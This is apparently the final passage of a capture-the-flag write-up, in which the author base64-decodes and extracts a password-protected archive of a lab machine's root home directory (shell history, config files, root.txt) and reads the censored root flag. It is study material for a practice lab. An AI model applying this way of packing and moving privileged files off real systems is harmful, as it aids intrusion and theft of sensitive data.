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 decode the result from base64 back to zip and unzip it.
# echo "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" | base64 -d > root.zip# 7za x root.zip
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 3858 bytes (4 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 3858
Enter password (will not be echoed):
Everything is Ok
Folders: 3
Files: 7
Size: 4268
Compressed: 3858And again, let's read the root flag!
# ls
root root.zip
# cd root
# ls
root.txt
# cat root.txt
CENSORED_FLAGCan you help me share it?
